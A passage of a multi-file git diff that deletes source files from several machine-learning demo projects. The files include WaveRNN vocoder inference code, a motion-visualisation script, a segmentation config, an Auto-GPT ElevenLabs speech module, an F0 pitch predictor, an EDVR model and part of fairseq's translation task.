- wave_len = (mels.size(-1) - 1) * self.hop_length
- mels = self.pad_tensor(mels.transpose(1, 2), pad=self.pad, side="both")
- mels, aux = self.upsample(mels.transpose(1, 2))
-
- if batched:
- mels = self.fold_with_overlap(mels, target, overlap)
- aux = self.fold_with_overlap(aux, target, overlap)
-
- b_size, seq_len, _ = mels.size()
-
- if torch.cuda.is_available():
- h1 = torch.zeros(b_size, self.rnn_dims).cuda()
- h2 = torch.zeros(b_size, self.rnn_dims).cuda()
- x = torch.zeros(b_size, 1).cuda()
- else:
- h1 = torch.zeros(b_size, self.rnn_dims).cpu()
- h2 = torch.zeros(b_size, self.rnn_dims).cpu()
- x = torch.zeros(b_size, 1).cpu()
-
- d = self.aux_dims
- aux_split = [aux[:, :, d * i : d * (i + 1)] for i in range(4)]
-
- for i in range(seq_len):
-
- m_t = mels[:, i, :]
-
- a1_t, a2_t, a3_t, a4_t = (a[:, i, :] for a in aux_split)
-
- x = torch.cat([x, m_t, a1_t], dim=1)
- x = self.I(x)
- h1 = rnn1(x, h1)
-
- x = x + h1
- inp = torch.cat([x, a2_t], dim=1)
- h2 = rnn2(inp, h2)
-
- x = x + h2
- x = torch.cat([x, a3_t], dim=1)
- x = F.relu(self.fc1(x))
-
- x = torch.cat([x, a4_t], dim=1)
- x = F.relu(self.fc2(x))
-
- logits = self.fc3(x)
-
- if self.mode == "MOL":
- sample = sample_from_discretized_mix_logistic(
- logits.unsqueeze(0).transpose(1, 2)
- )
- output.append(sample.view(-1))
- if torch.cuda.is_available():
- # x = torch.FloatTensor([[sample]]).cuda()
- x = sample.transpose(0, 1).cuda()
- else:
- x = sample.transpose(0, 1)
-
- elif self.mode == "RAW":
- posterior = F.softmax(logits, dim=1)
- distrib = torch.distributions.Categorical(posterior)
-
- sample = 2 * distrib.sample().float() / (self.n_classes - 1.0) - 1.0
- output.append(sample)
- x = sample.unsqueeze(-1)
- else:
- raise RuntimeError("Unknown model mode value - ", self.mode)
-
- output = torch.stack(output).transpose(0, 1)
- output = output.cpu().numpy()
- output = output.astype(np.float64)
-
- if batched:
- output = self.xfade_and_unfold(output, target, overlap)
- else:
- output = output[0]
-
- if mu_law:
- output = decode_mu_law(output, self.n_classes, False)
- if hp.apply_preemphasis:
- output = de_emphasis(output)
-
- # Fade-out at the end to avoid signal cutting out suddenly
- fade_out = np.linspace(1, 0, 20 * self.hop_length)
- output = output[:wave_len]
- output[-20 * self.hop_length :] *= fade_out
-
- self.train()
-
- return output
-
- def get_gru_cell(self, gru):
- gru_cell = nn.GRUCell(gru.input_size, gru.hidden_size)
- gru_cell.weight_hh.data = gru.weight_hh_l0.data
- gru_cell.weight_ih.data = gru.weight_ih_l0.data
- gru_cell.bias_hh.data = gru.bias_hh_l0.data
- gru_cell.bias_ih.data = gru.bias_ih_l0.data
- return gru_cell
-
- def pad_tensor(self, x, pad, side="both"):
- # NB - this is just a quick method i need right now
- # i.e., it won't generalise to other shapes/dims
- b, t, c = x.size()
- total = t + 2 * pad if side == "both" else t + pad
- if torch.cuda.is_available():
- padded = torch.zeros(b, total, c).cuda()
- else:
- padded = torch.zeros(b, total, c).cpu()
- if side == "before" or side == "both":
- padded[:, pad : pad + t, :] = x
- elif side == "after":
- padded[:, :t, :] = x
- return padded
-
- def fold_with_overlap(self, x, target, overlap):
-
- """Fold the tensor with overlap for quick batched inference.
- Overlap will be used for crossfading in xfade_and_unfold()
-
- Args:
- x (tensor) : Upsampled conditioning features.
- shape=(1, timesteps, features)
- target (int) : Target timesteps for each index of batch
- overlap (int) : Timesteps for both xfade and rnn warmup
-
- Return:
- (tensor) : shape=(num_folds, target + 2 * overlap, features)
-
- Details:
- x = [[h1, h2, ... hn]]
-
- Where each h is a vector of conditioning features
-
- Eg: target=2, overlap=1 with x.size(1)=10
-
- folded = [[h1, h2, h3, h4],
- [h4, h5, h6, h7],
- [h7, h8, h9, h10]]
- """
-
- _, total_len, features = x.size()
-
- # Calculate variables needed
- num_folds = (total_len - overlap) // (target + overlap)
- extended_len = num_folds * (overlap + target) + overlap
- remaining = total_len - extended_len
-
- # Pad if some time steps poking out
- if remaining != 0:
- num_folds += 1
- padding = target + 2 * overlap - remaining
- x = self.pad_tensor(x, padding, side="after")
-
- if torch.cuda.is_available():
- folded = torch.zeros(num_folds, target + 2 * overlap, features).cuda()
- else:
- folded = torch.zeros(num_folds, target + 2 * overlap, features).cpu()
-
- # Get the values for the folded tensor
- for i in range(num_folds):
- start = i * (target + overlap)
- end = start + target + 2 * overlap
- folded[i] = x[:, start:end, :]
-
- return folded
-
- def xfade_and_unfold(self, y, target, overlap):
-
- """Applies a crossfade and unfolds into a 1d array.
-
- Args:
- y (ndarry) : Batched sequences of audio samples
- shape=(num_folds, target + 2 * overlap)
- dtype=np.float64
- overlap (int) : Timesteps for both xfade and rnn warmup
-
- Return:
- (ndarry) : audio samples in a 1d array
- shape=(total_len)
- dtype=np.float64
-
- Details:
- y = [[seq1],
- [seq2],
- [seq3]]
-
- Apply a gain envelope at both ends of the sequences
-
- y = [[seq1_in, seq1_target, seq1_out],
- [seq2_in, seq2_target, seq2_out],
- [seq3_in, seq3_target, seq3_out]]
-
- Stagger and add up the groups of samples:
-
- [seq1_in, seq1_target, (seq1_out + seq2_in), seq2_target, ...]
-
- """
-
- num_folds, length = y.shape
- target = length - 2 * overlap
- total_len = num_folds * (target + overlap) + overlap
-
- # Need some silence for the rnn warmup
- silence_len = overlap // 2
- fade_len = overlap - silence_len
- silence = np.zeros((silence_len), dtype=np.float64)
-
- # Equal power crossfade
- t = np.linspace(-1, 1, fade_len, dtype=np.float64)
- fade_in = np.sqrt(0.5 * (1 + t))
- fade_out = np.sqrt(0.5 * (1 - t))
-
- # Concat the silence to the fades
- fade_in = np.concatenate([silence, fade_in])
- fade_out = np.concatenate([fade_out, silence])
-
- # Apply the gain to the overlap samples
- y[:, :overlap] *= fade_in
- y[:, -overlap:] *= fade_out
-
- unfolded = np.zeros((total_len), dtype=np.float64)
-
- # Loop to add up all the samples
- for i in range(num_folds):
- start = i * (target + overlap)
- end = start + target + 2 * overlap
- unfolded[start:end] += y[i]
-
- return unfolded
-
- def get_step(self):
- return self.step.data.item()
-
- def checkpoint(self, model_dir, optimizer):
- k_steps = self.get_step() // 1000
- self.save(model_dir.joinpath("checkpoint_%dk_steps.pt" % k_steps), optimizer)
-
- def load(self, path, optimizer):
- checkpoint = torch.load(path)
- if "optimizer_state" in checkpoint:
- self.load_state_dict(checkpoint["model_state"])
- optimizer.load_state_dict(checkpoint["optimizer_state"])
- else:
- # Backwards compatibility
- self.load_state_dict(checkpoint)
-
- def save(self, path, optimizer):
- torch.save(
- {
- "model_state": self.state_dict(),
- "optimizer_state": optimizer.state_dict(),
- },
- path,
- )
-
- def num_params(self):
- parameters = filter(lambda p: p.requires_grad, self.parameters())
- parameters = sum([np.prod(p.size()) for p in parameters]) / 1_000_000
- logger.debug("Trainable Parameters: %.3fM" % parameters)
diff --git a/spaces/Marshalls/testmtd/analysis/visualization/generate_video_from_moglow_pos.py b/spaces/Marshalls/testmtd/analysis/visualization/generate_video_from_moglow_pos.py
deleted file mode 100644
index 37348857716ebc4e3bf7f441d9adba40bcdb5de8..0000000000000000000000000000000000000000
--- a/spaces/Marshalls/testmtd/analysis/visualization/generate_video_from_moglow_pos.py
+++ /dev/null
@@ -1,76 +0,0 @@
-import pickle
-import matplotlib.pyplot as plt
-import numpy as np
-from sklearn.pipeline import Pipeline
-import joblib as jl
-from .utils import generate_video_from_images, join_video_and_audio
-import os
-#root_dir = os.path.dirname(os.path.realpath(__file__))
-
-import matplotlib
-matplotlib.use("Agg")
-import matplotlib.pyplot as plt
-from mpl_toolkits.mplot3d import Axes3D
-import numpy as np
-from scipy.spatial.transform import Rotation as R
-
-def pre_process_motion_data(clip, init_rot=None, init_trans=None, fps=30, axis_scale=50, elev=45, azim=45):
- rot = init_rot if init_rot is not None else R.from_quat([0,0,0,1])
- translation = init_trans if init_trans is not None else np.array([[0,0,0]])
- translations = np.zeros((clip.shape[0],3))
-
- joints, root_dx, root_dz, root_dr = clip[:,:-3], clip[:,-3], clip[:,-2], clip[:,-1]
- joints = joints.reshape((len(joints), -1, 3))
- for i in range(len(joints)):
- joints[i,:,:] = rot.apply(joints[i])
- joints[i,:,0] = joints[i,:,0] + translation[0,0]
- joints[i,:,2] = joints[i,:,2] + translation[0,2]
- rot = R.from_rotvec(np.array([0,-root_dr[i],0])) * rot
- translation = translation + rot.apply(np.array([root_dx[i], 0, root_dz[i]]))
- translations[i,:] = translation
-
- return joints, translation, rot, translations
-
-def generate_video_from_moglow_loc(data, control, output_folder, seq_id, audio_file, fps, trim_audio=0):
- # import pdb;pdb.set_trace()
- clip = np.concatenate([data,control], axis=1)
-
- joints, translation, rot, translations = pre_process_motion_data(clip, fps=20, axis_scale=50, elev=45, azim=45)
-
- fig = plt.figure()
- plt.ion()
- plt.show()
- ax = Axes3D(fig)
- keypoints3d = joints
-
- ax.scatter(keypoints3d[0,:,0],keypoints3d[0,:,1],keypoints3d[0,:,2])
-
- imgs_folder="analysis/visualization/img/"+seq_id
- if not os.path.exists(imgs_folder):
- os.mkdir(imgs_folder)
-
- plt.xlim([-10,10])
- plt.ylim([0,20])
- ax.set_zlim([-10,10])
- ax.view_init(90,-90)
- plt.draw()
- plt.pause(0.001)
- plt.savefig(imgs_folder+"/img_"+str(0)+".png")
-
- for i in range(1,len(keypoints3d)):
- print(i)
- ax.clear()
- ax.scatter(keypoints3d[i,:,0], keypoints3d[i,:,1], keypoints3d[i,:,2])
- plt.xlim([-10,10])
- plt.ylim([0,20])
- ax.set_zlim([-10,10])
- ax.view_init(90,-90)
- plt.draw()
- plt.pause(0.001)
- plt.savefig(imgs_folder+"/img_"+str(i)+".png")
-
- video_file = f'{output_folder}/{seq_id}.mp4'
- generate_video_from_images(imgs_folder, video_file, fps)
- if audio_file is not None:
- join_video_and_audio(video_file, audio_file, trim_audio)
-
diff --git a/spaces/Mellow-ai/PhotoAI_Mellow/annotator/uniformer/exp/upernet_global_small/test_config_g.py b/spaces/Mellow-ai/PhotoAI_Mellow/annotator/uniformer/exp/upernet_global_small/test_config_g.py
deleted file mode 100644
index e43737a98a3b174a9f2fe059c06d511144686459..0000000000000000000000000000000000000000
--- a/spaces/Mellow-ai/PhotoAI_Mellow/annotator/uniformer/exp/upernet_global_small/test_config_g.py
+++ /dev/null
@@ -1,38 +0,0 @@
-_base_ = [
- '../../configs/_base_/models/upernet_uniformer.py',
- '../../configs/_base_/datasets/ade20k.py',
- '../../configs/_base_/default_runtime.py',
- '../../configs/_base_/schedules/schedule_160k.py'
-]
-model = dict(
- backbone=dict(
- type='UniFormer',
- embed_dim=[64, 128, 320, 512],
- layers=[3, 4, 8, 3],
- head_dim=64,
- drop_path_rate=0.25,
- windows=False,
- hybrid=False,
- ),
- decode_head=dict(
- in_channels=[64, 128, 320, 512],
- num_classes=150
- ),
- auxiliary_head=dict(
- in_channels=320,
- num_classes=150
- ))
-
-# AdamW optimizer, no weight decay for position embedding & layer norm in backbone
-optimizer = dict(_delete_=True, type='AdamW', lr=0.00006, betas=(0.9, 0.999), weight_decay=0.01,
- paramwise_cfg=dict(custom_keys={'absolute_pos_embed': dict(decay_mult=0.),
- 'relative_position_bias_table': dict(decay_mult=0.),
- 'norm': dict(decay_mult=0.)}))
-
-lr_config = dict(_delete_=True, policy='poly',
- warmup='linear',
- warmup_iters=1500,
- warmup_ratio=1e-6,
- power=1.0, min_lr=0.0, by_epoch=False)
-
-data=dict(samples_per_gpu=2)
\ No newline at end of file
diff --git a/spaces/MetaWabbit/Auto-GPT/autogpt/processing/__init__.py b/spaces/MetaWabbit/Auto-GPT/autogpt/processing/__init__.py
deleted file mode 100644
index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000
diff --git a/spaces/MetaWabbit/Auto-GPT/autogpt/speech/eleven_labs.py b/spaces/MetaWabbit/Auto-GPT/autogpt/speech/eleven_labs.py
deleted file mode 100644
index ea84efd8ca9489b40919ecd571813fe954b078e3..0000000000000000000000000000000000000000
--- a/spaces/MetaWabbit/Auto-GPT/autogpt/speech/eleven_labs.py
+++ /dev/null
@@ -1,86 +0,0 @@
-"""ElevenLabs speech module"""
-import os
-
-import requests
-from playsound import playsound
-
-from autogpt.config import Config
-from autogpt.speech.base import VoiceBase
-
-PLACEHOLDERS = {"your-voice-id"}
-
-
-class ElevenLabsSpeech(VoiceBase):
- """ElevenLabs speech class"""
-
- def _setup(self) -> None:
- """Set up the voices, API key, etc.
-
- Returns:
- None: None
- """
-
- cfg = Config()
- default_voices = ["ErXwobaYiN019PkySvjV", "EXAVITQu4vr4xnSDxMaL"]
- voice_options = {
- "Rachel": "21m00Tcm4TlvDq8ikWAM",
- "Domi": "AZnzlk1XvdvUeBnXmlld",
- "Bella": "EXAVITQu4vr4xnSDxMaL",
- "Antoni": "ErXwobaYiN019PkySvjV",
- "Elli": "MF3mGyEYCl7XYWbV9V6O",
- "Josh": "TxGEqnHWrfWFTfGW9XjX",
- "Arnold": "VR6AewLTigWG4xSOukaG",
- "Adam": "pNInz6obpgDQGcFmaJgB",
- "Sam": "yoZ06aMxZJJ28mfd3POQ",
- }
- self._headers = {
- "Content-Type": "application/json",
- "xi-api-key": cfg.elevenlabs_api_key,
- }
- self._voices = default_voices.copy()
- if cfg.elevenlabs_voice_1_id in voice_options:
- cfg.elevenlabs_voice_1_id = voice_options[cfg.elevenlabs_voice_1_id]
- if cfg.elevenlabs_voice_2_id in voice_options:
- cfg.elevenlabs_voice_2_id = voice_options[cfg.elevenlabs_voice_2_id]
- self._use_custom_voice(cfg.elevenlabs_voice_1_id, 0)
- self._use_custom_voice(cfg.elevenlabs_voice_2_id, 1)
-
- def _use_custom_voice(self, voice, voice_index) -> None:
- """Use a custom voice if provided and not a placeholder
-
- Args:
- voice (str): The voice ID
- voice_index (int): The voice index
-
- Returns:
- None: None
- """
- # Placeholder values that should be treated as empty
- if voice and voice not in PLACEHOLDERS:
- self._voices[voice_index] = voice
-
- def _speech(self, text: str, voice_index: int = 0) -> bool:
- """Speak text using elevenlabs.io's API
-
- Args:
- text (str): The text to speak
- voice_index (int, optional): The voice to use. Defaults to 0.
-
- Returns:
- bool: True if the request was successful, False otherwise
- """
- tts_url = (
- f"https://api.elevenlabs.io/v1/text-to-speech/{self._voices[voice_index]}"
- )
- response = requests.post(tts_url, headers=self._headers, json={"text": text})
-
- if response.status_code == 200:
- with open("speech.mpeg", "wb") as f:
- f.write(response.content)
- playsound("speech.mpeg", True)
- os.remove("speech.mpeg")
- return True
- else:
- print("Request failed with status code:", response.status_code)
- print("Response content:", response.content)
- return False
diff --git a/spaces/MirageML/sjc/sd1/ldm/modules/distributions/__init__.py b/spaces/MirageML/sjc/sd1/ldm/modules/distributions/__init__.py
deleted file mode 100644
index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000
diff --git a/spaces/MrBodean/VoiceClone/utils/__init__.py b/spaces/MrBodean/VoiceClone/utils/__init__.py
deleted file mode 100644
index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000
diff --git a/spaces/NMEX/rvc-hoyogame-v2/lib/infer_pack/modules/F0Predictor/DioF0Predictor.py b/spaces/NMEX/rvc-hoyogame-v2/lib/infer_pack/modules/F0Predictor/DioF0Predictor.py
deleted file mode 100644
index ee3171bcb7c4a5066560723108b56e055f18be45..0000000000000000000000000000000000000000
--- a/spaces/NMEX/rvc-hoyogame-v2/lib/infer_pack/modules/F0Predictor/DioF0Predictor.py
+++ /dev/null
@@ -1,90 +0,0 @@
-from lib.infer_pack.modules.F0Predictor.F0Predictor import F0Predictor
-import pyworld
-import numpy as np
-
-
-class DioF0Predictor(F0Predictor):
- def __init__(self, hop_length=512, f0_min=50, f0_max=1100, sampling_rate=44100):
- self.hop_length = hop_length
- self.f0_min = f0_min
- self.f0_max = f0_max
- self.sampling_rate = sampling_rate
-
- def interpolate_f0(self, f0):
- """
- 对F0进行插值处理
- """
-
- data = np.reshape(f0, (f0.size, 1))
-
- vuv_vector = np.zeros((data.size, 1), dtype=np.float32)
- vuv_vector[data > 0.0] = 1.0
- vuv_vector[data <= 0.0] = 0.0
-
- ip_data = data
-
- frame_number = data.size
- last_value = 0.0
- for i in range(frame_number):
- if data[i] <= 0.0:
- j = i + 1
- for j in range(i + 1, frame_number):
- if data[j] > 0.0:
- break
- if j < frame_number - 1:
- if last_value > 0.0:
- step = (data[j] - data[i - 1]) / float(j - i)
- for k in range(i, j):
- ip_data[k] = data[i - 1] + step * (k - i + 1)
- else:
- for k in range(i, j):
- ip_data[k] = data[j]
- else:
- for k in range(i, frame_number):
- ip_data[k] = last_value
- else:
- ip_data[i] = data[i] # 这里可能存在一个没有必要的拷贝
- last_value = data[i]
-
- return ip_data[:, 0], vuv_vector[:, 0]
-
- def resize_f0(self, x, target_len):
- source = np.array(x)
- source[source < 0.001] = np.nan
- target = np.interp(
- np.arange(0, len(source) * target_len, len(source)) / target_len,
- np.arange(0, len(source)),
- source,
- )
- res = np.nan_to_num(target)
- return res
-
- def compute_f0(self, wav, p_len=None):
- if p_len is None:
- p_len = wav.shape[0] // self.hop_length
- f0, t = pyworld.dio(
- wav.astype(np.double),
- fs=self.sampling_rate,
- f0_floor=self.f0_min,
- f0_ceil=self.f0_max,
- frame_period=1000 * self.hop_length / self.sampling_rate,
- )
- f0 = pyworld.stonemask(wav.astype(np.double), f0, t, self.sampling_rate)
- for index, pitch in enumerate(f0):
- f0[index] = round(pitch, 1)
- return self.interpolate_f0(self.resize_f0(f0, p_len))[0]
-
- def compute_f0_uv(self, wav, p_len=None):
- if p_len is None:
- p_len = wav.shape[0] // self.hop_length
- f0, t = pyworld.dio(
- wav.astype(np.double),
- fs=self.sampling_rate,
- f0_floor=self.f0_min,
- f0_ceil=self.f0_max,
- frame_period=1000 * self.hop_length / self.sampling_rate,
- )
- f0 = pyworld.stonemask(wav.astype(np.double), f0, t, self.sampling_rate)
- for index, pitch in enumerate(f0):
- f0[index] = round(pitch, 1)
- return self.interpolate_f0(self.resize_f0(f0, p_len))
diff --git a/spaces/OAOA/DifFace/basicsr/models/edvr_model.py b/spaces/OAOA/DifFace/basicsr/models/edvr_model.py
deleted file mode 100644
index 9bdbf7b94fe3f06c76fbf2a4941621f64e0003e7..0000000000000000000000000000000000000000
--- a/spaces/OAOA/DifFace/basicsr/models/edvr_model.py
+++ /dev/null
@@ -1,62 +0,0 @@
-from basicsr.utils import get_root_logger
-from basicsr.utils.registry import MODEL_REGISTRY
-from .video_base_model import VideoBaseModel
-
-
-@MODEL_REGISTRY.register()
-class EDVRModel(VideoBaseModel):
- """EDVR Model.
-
- Paper: EDVR: Video Restoration with Enhanced Deformable Convolutional Networks. # noqa: E501
- """
-
- def __init__(self, opt):
- super(EDVRModel, self).__init__(opt)
- if self.is_train:
- self.train_tsa_iter = opt['train'].get('tsa_iter')
-
- def setup_optimizers(self):
- train_opt = self.opt['train']
- dcn_lr_mul = train_opt.get('dcn_lr_mul', 1)
- logger = get_root_logger()
- logger.info(f'Multiple the learning rate for dcn with {dcn_lr_mul}.')
- if dcn_lr_mul == 1:
- optim_params = self.net_g.parameters()
- else: # separate dcn params and normal params for different lr
- normal_params = []
- dcn_params = []
- for name, param in self.net_g.named_parameters():
- if 'dcn' in name:
- dcn_params.append(param)
- else:
- normal_params.append(param)
- optim_params = [
- { # add normal params first
- 'params': normal_params,
- 'lr': train_opt['optim_g']['lr']
- },
- {
- 'params': dcn_params,
- 'lr': train_opt['optim_g']['lr'] * dcn_lr_mul
- },
- ]
-
- optim_type = train_opt['optim_g'].pop('type')
- self.optimizer_g = self.get_optimizer(optim_type, optim_params, **train_opt['optim_g'])
- self.optimizers.append(self.optimizer_g)
-
- def optimize_parameters(self, current_iter):
- if self.train_tsa_iter:
- if current_iter == 1:
- logger = get_root_logger()
- logger.info(f'Only train TSA module for {self.train_tsa_iter} iters.')
- for name, param in self.net_g.named_parameters():
- if 'fusion' not in name:
- param.requires_grad = False
- elif current_iter == self.train_tsa_iter:
- logger = get_root_logger()
- logger.warning('Train all the parameters.')
- for param in self.net_g.parameters():
- param.requires_grad = True
-
- super(EDVRModel, self).optimize_parameters(current_iter)
diff --git a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/fairseq/tasks/translation.py b/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/fairseq/tasks/translation.py
deleted file mode 100644
index 86473608677c62b063cd9889ed29d59002523be7..0000000000000000000000000000000000000000
--- a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/fairseq/tasks/translation.py
+++ /dev/null
@@ -1,493 +0,0 @@
-# Copyright (c) Facebook, Inc. and its affiliates.
-#
-# This source code is licensed under the MIT license found in the
-# LICENSE file in the root directory of this source tree.
-
-from dataclasses import dataclass, field
-import itertools
-import json
-import logging
-import os
-from typing import Optional
-from argparse import Namespace
-from omegaconf import II
-
-import numpy as np
-from fairseq import metrics, utils
-from fairseq.data import (
- AppendTokenDataset,
- ConcatDataset,
- LanguagePairDataset,
- PrependTokenDataset,
- StripTokenDataset,
- TruncateDataset,
- data_utils,
- encoders,
- indexed_dataset,
-)
-from fairseq.data.indexed_dataset import get_available_dataset_impl
-from fairseq.dataclass import ChoiceEnum, FairseqDataclass
-from fairseq.tasks import FairseqTask, register_task
-
-
-EVAL_BLEU_ORDER = 4
-
-
-logger = logging.getLogger(__name__)
-
-
-def load_langpair_dataset(
- data_path,
- split,
- src,
- src_dict,
- tgt,
- tgt_dict,
- combine,
- dataset_impl,
- upsample_primary,
- left_pad_source,
- left_pad_target,
- max_source_positions,
- max_target_positions,
- prepend_bos=False,
- load_alignments=False,
- truncate_source=False,
- append_source_id=False,
- num_buckets=0,
- shuffle=True,
- pad_to_multiple=1,
- prepend_bos_src=None,
-):
- def split_exists(split, src, tgt, lang, data_path):
- filename = os.path.join(data_path, "{}.{}-{}.{}".format(split, src, tgt, lang))
- return indexed_dataset.dataset_exists(filename, impl=dataset_impl)
-
- src_datasets = []
- tgt_datasets = []
-
- for k in itertools.count():
- split_k = split + (str(k) if k > 0 else "")
-
- # infer langcode
- if split_exists(split_k, src, tgt, src, data_path):
- prefix = os.path.join(data_path, "{}.{}-{}.".format(split_k, src, tgt))
- elif split_exists(split_k, tgt, src, src, data_path):
- prefix = os.path.join(data_path, "{}.{}-{}.".format(split_k, tgt, src))
- else:
- if k > 0:
- break
- else:
- raise FileNotFoundError(
- "Dataset not found: {} ({})".format(split, data_path)
- )
-
- src_dataset = data_utils.load_indexed_dataset(
- prefix + src, src_dict, dataset_impl
- )
- if truncate_source:
- src_dataset = AppendTokenDataset(
- TruncateDataset(
- StripTokenDataset(src_dataset, src_dict.eos()),
- max_source_positions - 1,
- ),
- src_dict.eos(),
- )
- src_datasets.append(src_dataset)
-
- tgt_dataset = data_utils.load_indexed_dataset(
- prefix + tgt, tgt_dict, dataset_impl
- )
- if tgt_dataset is not None:
- tgt_datasets.append(tgt_dataset)
-
- logger.info(
- "{} {} {}-{} {} examples".format(
- data_path, split_k, src, tgt, len(src_datasets[-1])
- )
- )
-
- if not combine:
- break
-
- assert len(src_datasets) == len(tgt_datasets) or len(tgt_datasets) == 0
-
- if len(src_datasets) == 1:
- src_dataset = src_datasets[0]
- tgt_dataset = tgt_datasets[0] if len(tgt_datasets) > 0 else None
- else:
- sample_ratios = [1] * len(src_datasets)
- sample_ratios[0] = upsample_primary
- src_dataset = ConcatDataset(src_datasets, sample_ratios)
- if len(tgt_datasets) > 0:
- tgt_dataset = ConcatDataset(tgt_datasets, sample_ratios)
- else:
- tgt_dataset = None
-
- if prepend_bos:
- assert hasattr(src_dict, "bos_index") and hasattr(tgt_dict, "bos_index")
- src_dataset = PrependTokenDataset(src_dataset, src_dict.bos())
- if tgt_dataset is not None:
- tgt_dataset = PrependTokenDataset(tgt_dataset, tgt_dict.bos())
- elif prepend_bos_src is not None:
- logger.info(f"prepending src bos: {prepend_bos_src}")
- src_dataset = PrependTokenDataset(src_dataset, prepend_bos_src)
-
- eos = None
- if append_source_id:
- src_dataset = AppendTokenDataset(
- src_dataset, src_dict.index("[{}]".format(src))
- )
- if tgt_dataset is not None:
- tgt_dataset = AppendTokenDataset(
- tgt_dataset, tgt_dict.index("[{}]".format(tgt))
- )
- eos = tgt_dict.index("[{}]".format(tgt))
-
- align_dataset = None
- if load_alignments:
- align_path = os.path.join(data_path, "{}.align.{}-{}".format(split, src, tgt))
- if indexed_dataset.dataset_exists(align_path, impl=dataset_impl):
- align_dataset = data_utils.load_indexed_dataset(
- align_path, None, dataset_impl
- )
-
- tgt_dataset_sizes = tgt_dataset.sizes if tgt_dataset is not None else None
- return LanguagePairDataset(
- src_dataset,
- src_dataset.sizes,
- src_dict,
- tgt_dataset,
- tgt_dataset_sizes,
- tgt_dict,
- left_pad_source=left_pad_source,
- left_pad_target=left_pad_target,
- align_dataset=align_dataset,
- eos=eos,
- num_buckets=num_buckets,
- shuffle=shuffle,
- pad_to_multiple=pad_to_multiple,
- )
-
-
-@dataclass
-class TranslationConfig(FairseqDataclass):
- data: Optional[str] = field(
- default=None,
- metadata={
- "help": "colon separated path to data directories list, will be iterated upon during epochs "
- "in round-robin manner; however, valid and test data are always in the first directory "
- "to avoid the need for repeating them in all directories"
- },
- )
- source_lang: Optional[str] = field(
- default=None,
- metadata={
- "help": "source language",
- "argparse_alias": "-s",
- },
- )
- target_lang: Optional[str] = field(
- default=None,
- metadata={
- "help": "target language",
- "argparse_alias": "-t",
- },
- )
- load_alignments: bool = field(
- default=False, metadata={"help": "load the binarized alignments"}
- )
- left_pad_source: bool = field(
- default=True, metadata={"help": "pad the source on the left"}
- )
- left_pad_target: bool = field(
- default=False, metadata={"help": "pad the target on the left"}
- )
- max_source_positions: int = field(
- default=1024, metadata={"help": "max number of tokens in the source sequence"}
- )
- max_target_positions: int = field(
- default=1024, metadata={"help": "max number of tokens in the target sequence"}
- )
- upsample_primary: int = field(
- default=-1, metadata={"help": "the amount of upsample primary dataset"}
- )
- truncate_source: bool = field(
- default=False, metadata={"help": "truncate source to max-source-positions"}
- )
- num_batch_buckets: int = field(
- default=0,
- metadata={
- "help": "if >0, then bucket source and target lengths into "
- "N buckets and pad accordingly; this is useful on TPUs to minimize the number of compilations"
- },
- )
- train_subset: str = II("dataset.train_subset")
- dataset_impl: Optional[ChoiceEnum(get_available_dataset_impl())] = II(
- "dataset.dataset_impl"
- )
- required_seq_len_multiple: int = II("dataset.required_seq_len_multiple")
-
- # options for reporting BLEU during validation
- eval_bleu: bool = field(
- default=False, metadata={"help": "evaluation with BLEU scores"}
- )
- eval_bleu_args: Optional[str] = field(
- default="{}",
- metadata={
- "help": 'generation args for BLUE scoring, e.g., \'{"beam": 4, "lenpen": 0.6}\', as JSON string'
- },
- )
- eval_bleu_detok: str = field(
- default="space",
- metadata={
- "help": "detokenize before computing BLEU (e.g., 'moses'); required if using --eval-bleu; "
- "use 'space' to disable detokenization; see fairseq.data.encoders for other options"
- },
- )
- eval_bleu_detok_args: Optional[str] = field(
- default="{}",
- metadata={"help": "args for building the tokenizer, if needed, as JSON string"},
- )
- eval_tokenized_bleu: bool = field(
- default=False, metadata={"help": "compute tokenized BLEU instead of sacrebleu"}
- )
- eval_bleu_remove_bpe: Optional[str] = field(
- default=None,
- metadata={
- "help": "remove BPE before computing BLEU",
- "argparse_const": "@@ ",
- },
- )
- eval_bleu_print_samples: bool = field(
- default=False, metadata={"help": "print sample generations during validation"}
- )
-
-
-@register_task("translation", dataclass=TranslationConfig)
-class TranslationTask(FairseqTask):
- """
- Translate from one (source) language to another (target) language.
-
- Args:
- src_dict (~fairseq.data.Dictionary): dictionary for the source language
- tgt_dict (~fairseq.data.Dictionary): dictionary for the target language
-
- .. note::
-
- The translation task is compatible with :mod:`fairseq-train`,
- :mod:`fairseq-generate` and :mod:`fairseq-interactive`.
- """
-
- cfg: TranslationConfig
-
- def __init__(self, cfg: TranslationConfig, src_dict, tgt_dict):
- super().__init__(cfg)
- self.src_dict = src_dict
- self.tgt_dict = tgt_dict
-
- @classmethod
- def setup_task(cls, cfg: TranslationConfig, **kwargs):
- """Setup the task (e.g., load dictionaries).
-
- Args:
- args (argparse.Namespace): parsed command-line arguments
- """
-
- paths = utils.split_paths(cfg.data)
- assert len(paths) > 0
- # find language pair automatically
- if cfg.source_lang is None or cfg.target_lang is None:
- cfg.source_lang, cfg.target_lang = data_utils.infer_language_pair(paths[0])
- if cfg.source_lang is None or cfg.target_lang is None:
- raise Exception(
- "Could not infer language pair, please provide it explicitly"
- )
-
- # load dictionaries
- src_dict = cls.load_dictionary(
- os.path.join(paths[0], "dict.{}.txt".format(cfg.source_lang))
- )
- tgt_dict = cls.load_dictionary(
- os.path.join(paths[0], "dict.{}.txt".format(cfg.target_lang))
- )
- assert src_dict.pad() == tgt_dict.pad()
- assert src_dict.eos() == tgt_dict.eos()
- assert src_dict.unk() == tgt_dict.unk()
- logger.info("[{}] dictionary: {} types".format(cfg.source_lang, len(src_dict)))
- logger.info("[{}] dictionary: {} types".format(cfg.target_lang, len(tgt_dict)))
-
- return cls(cfg, src_dict, tgt_dict)
-
- def load_dataset(self, split, epoch=1, combine=False, **kwargs):
- """Load a given dataset split.
-
- Args:
- split (str): name of the split (e.g., train, valid, test)
- """
- paths = utils.split_paths(self.cfg.data)
- assert len(paths) > 0
- if split != self.cfg.train_subset:
- # if not training data set, use the first shard for valid and test
- paths = paths[:1]
- data_path = paths[(epoch - 1) % len(paths)]
-
- # infer langcode
- src, tgt = self.cfg.source_lang, self.cfg.target_lang
-
- self.datasets[split] = load_langpair_dataset(
